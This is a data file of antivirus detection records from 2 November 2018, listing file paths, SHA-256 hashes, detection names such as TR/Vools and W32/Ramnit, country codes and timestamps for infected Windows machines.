  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:55:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-113439-309348fd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3be4a532\\AVSCAN-20181102-113425-2E2034C6\\AVSCAN-20181102-113439-309348FD', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:34:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-02T01:22:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='\\\\?\\c:\\windows\\system32\\maintenancesservices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:47:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-02T03:34:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:04:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:59:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:34:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:25:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:37:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:57:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:12:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='\\\\?\\c:\\windows\\system32\\maintenancesservices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:46:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-113448-dcef15e6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-113333-CE1903DE\\AVSCAN-20181102-113448-DCEF15E6', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:39:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:45:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:39:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:09:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='\\\\?\\c:\\windows\\system32\\maintenancesservices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:56:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:10:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:39:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-02T00:33:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='\\\\?\\c:\\windows\\system32\\maintenancesservices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:35:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='\\\\?\\c:\\windows\\system32\\maintenancesservices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:05:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='\\\\?\\c:\\windows\\system32\\maintenancesservices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:35:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:23:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-150040-e59866da', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a9d7dcb6\\AVSCAN-20181102-145232-7F982004\\AVSCAN-20181102-150040-E59866DA', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:00:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-150045-e6b3598a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a9d7dcb6\\AVSCAN-20181102-145232-7F982004\\AVSCAN-20181102-150045-E6B3598A', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:00:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-150031-e3b9bebb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a9d7dcb6\\AVSCAN-20181102-145232-7F982004\\AVSCAN-20181102-150031-E3B9BEBB', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:00:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:00:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:20:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:35:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:35:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-150018-e1117673', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a9d7dcb6\\AVSCAN-20181102-145232-7F982004\\AVSCAN-20181102-150018-E1117673', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:00:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-150028-e2fde5d8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a9d7dcb6\\AVSCAN-20181102-145232-7F982004\\AVSCAN-20181102-150028-E2FDE5D8', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:00:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-02T02:08:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:49:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-02T04:25:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-02T12:49:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:04:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-02T03:23:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:27:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-085734-4a08a846', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_92e9ac96\\AVSCAN-20181102-085704-4466B281\\AVSCAN-20181102-085734-4A08A846', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:57:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:09:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:14:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:23:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:49:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-02T00:48:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:15:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:19:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:19:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:08:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:36:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-090646-b0aa8847', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_92e9ac96\\AVSCAN-20181102-090636-AEB26403\\AVSCAN-20181102-090646-B0AA8847', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:06:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:01:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:58:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-02T06:03:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='\\\\?\\C:\\Windows\\system32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:57:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='\\\\?\\C:\\Windows\\system32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:57:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='al-kalam.exe', filepath='E:\\BACKUP\\MY DOCUMENT\\Al Kalam-Al Quran Full+Tajwid\\Al-Kalam.exe', filesize=1536000, name='W32/Chir.B.#M1.#R1'), hash='13dc9e41a0fcef6e324552a40a0a0a15d7efa42975092e2c28227ec3c23aea89', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-02T09:51:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='bdpdbx25.dll', filepath='\\\\?\\C:\\Program Files (x86)\\Embarcadero\\RAD Studio\\7.0\\bin\\bdpdbx25.dll', filesize=256000, name='W32/Ramnit.CD.#M1.#R1'), hash='14286411a9f892fac4ddd456e5d41c0e10c651e976c8045077376ec547485e9f', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:05:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='bdpdbx25.dll', filepath='C:\\Program Files (x86)\\Embarcadero\\RAD Studio\\7.0\\bin\\bdpdbx25.dll', filesize=256000, name='W32/Ramnit.CD.#M1.#R1'), hash='14286411a9f892fac4ddd456e5d41c0e10c651e976c8045077376ec547485e9f', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Roaming\\360se6\\Application\\360se.exe', parentsize=1190912, timestamp='2018-11-02T08:58:31Z'), dt=datetime.date(2018, 11, 2)),
